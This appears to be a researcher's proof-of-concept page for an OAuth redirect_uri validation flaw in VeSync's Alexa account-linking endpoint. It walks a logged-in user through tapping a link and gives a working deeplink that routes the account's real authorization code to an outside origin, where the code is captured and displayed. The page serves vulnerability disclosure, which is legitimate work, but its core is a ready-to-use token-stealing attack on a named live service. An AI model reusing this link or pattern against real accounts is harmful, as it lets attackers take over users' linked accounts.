redirect_uri PoC — VS-067Security proof-of-concept (researcher-controlled origin poc.purple8080.com). It shows that app.vesync.com/alexaWWAAuth sends your account's OAuth authorization code to an attacker-chosen, unvalidated redirect_uri.
1) Log into the VeSync app on this device. 2) Tap:
Trigger VeSync Alexa authorizationYou'll see the genuine "Connect to Alexa" screen. After you tap Allow, your real OAuth code is delivered here to poc.purple8080.com and shown on screen — proving the leak to an arbitrary origin.
Deeplink: https://app.vesync.com/alexaWWAAuth?redirect_uri=https%3A%2F%2Fpoc.purple8080.com%2Fgrab&state=vs067poc